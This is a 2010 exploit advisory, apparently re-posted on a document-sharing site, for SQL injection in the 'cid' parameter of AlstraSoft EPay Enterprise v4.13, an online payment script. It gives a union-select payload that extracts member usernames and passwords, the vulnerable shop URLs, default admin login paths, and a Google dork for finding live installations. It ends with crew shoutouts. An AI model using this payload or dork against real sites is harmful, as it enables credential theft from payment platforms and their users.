EPay Enterprise v4.13 cid SQL Injection Vulnerability

Document Sample
EPay Enterprise v4.13 cid SQL Injection Vulnerability Powered By Docstoc
					                             EPay Enterprise v4.13 cid SQL Injection Vulnerability                             Page 1/2
  1         )    )            )                     (    (         (   (    (       )      )
  2      ( /(( /( (        ( /( (        (    (     )\ ))\ )       )\ ))\ ) )\ ) ( /( ( /(
  3      )\())\()))\ )     )\()) )\      )\   )\   (()/(()/( ( (()/(()/((()/( )\()) )\())
  4     ((_)((_)\(()/(    ((_)((((_)( (((_)(((_)( /(_))(_)) )\ /(_))(_))/(_))(_)\|((_)\
  5    __ ((_)((_)/(_))___ ((_)\ _ )\ )\___)\ _ )\(_))(_))_ ((_)(_))(_)) (_)) _((_)_ ((_)
  6    \ \ / / _ (_)) __\ \ / (_)_\(_)(/ __(_)_\(_) _ \|     \| __| _ \ | |_ _|| \| | |/ /
  7     \ V / (_) || (_ |\ V / / _ \ | (__ / _ \ |     /| |) | _||    / |__ | | | .‘ | ’ <
  8      |_| \___/ \___| |_| /_/ \_\ \___/_/ \_\|_|_\|___/|___|_|_\____|___||_|\_|_|\_\
  9                                                                                      .WEB.ID
  10   −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  11            EPay Enterprise v4.13 (cid) SQL Injection Vulnerability
  12   −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  13   Author           : v3n0m
  14   Site             : http://yogyacarderlink.web.id/
  15   Date             : April, 23−2010
  16   Location         : Jakarta, Indonesia
  17   Time Zone        : GMT +7:00
  18   −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  19
  20   Affected software description:
  21   ~~~~~~~~~~~~~~~~~~~~~~~~~~
  22
  23   Application     :   AlstraSoft EPay Enterprise
  24   Vendor          :   http://www.alstrasoft.com/
  25   Price           :   $240 USD
  26   Google Dork     :   "Powered by EPay Enterprise" inurl:"shop.htm?cid=" inurl:"shop.php?cid="
  27   Overview        :
  28
  29   EPay Enterprise has been developed by AlstraSoft with the growing demand
  30   for online payment processing business similar to Paypal and Stormpay.com.
  31   −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  32
  33   Exploit:
  34   ~~~~~~~
  35
  36   −99999+union+all+select+all+null,null,group_concat(username,char(58),password)v3n0m+from+dp_members−−
  37
  38   SQLi p0c:
  39   ~~~~~~~
  40
  41   http://127.0.0.1/[path]/shop.htm?cid=[SQLi]
  42   http://127.0.0.1/[path]/shop.php?cid=[SQLi]
  43
  44
  45   Default Admin Login Page:
  46   ~~~~~~~~~~~~~~
  47   http://127.0.0.1/[path]/admins/login.php
  48   http://127.0.0.1/[path]/admins/login.htm
  49   −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  50
  51   Shoutz:
  52   ~~~~
v3n0m                                                                                                          04/23/2010
                           EPay Enterprise v4.13 cid SQL Injection Vulnerability                               Page 2/2
  53
  54   − ’You getz angry to me c’z you dunno what i did :( ’
  55   − LeQhi,lingah,GheMaX,spykit,m4rco,z0mb13,ast_boy,eidelweiss,xx_user,^pKi^,tian,zhie_o,JaLi−
  56   − setanmuda,oche_an3h,onez,Joglo,d4rk_kn19ht,Cakill Schumbag
  57   − kiddies,whitehat,c4uR [caur sekarang berubah,ga pernah bw martabak lagi :(],mywisdom,yadoy666,udhit
  58   − BLaSTER & TurkGuvenligi & Agd_scorp (Turkey Hackers)
  59   − elicha cristia [Mizz You...Mizz You...Mizz You... :)]
  60   − N.O.C & Technical Support @office
  61   − #yogyacarderlink @irc.dal.net
  62   −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  63   Contact:
  64   ~~~~
  65
  66   v3n0m | YOGYACARDERLINK CREW | v3n0m666[0x40]live[0x2E]com
  67   Homepage: http://yogyacarderlink.web.id/
  68             http://v3n0m.blogdetik.com/
  69             http://elich4.blogspot.com/ << Update donk >_<
  70
  71   −−−−−−−−−−−−−−−−−−−−−−−−−−−[EOF]−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−




v3n0m                                                                                                          04/23/2010

				
DOCUMENT INFO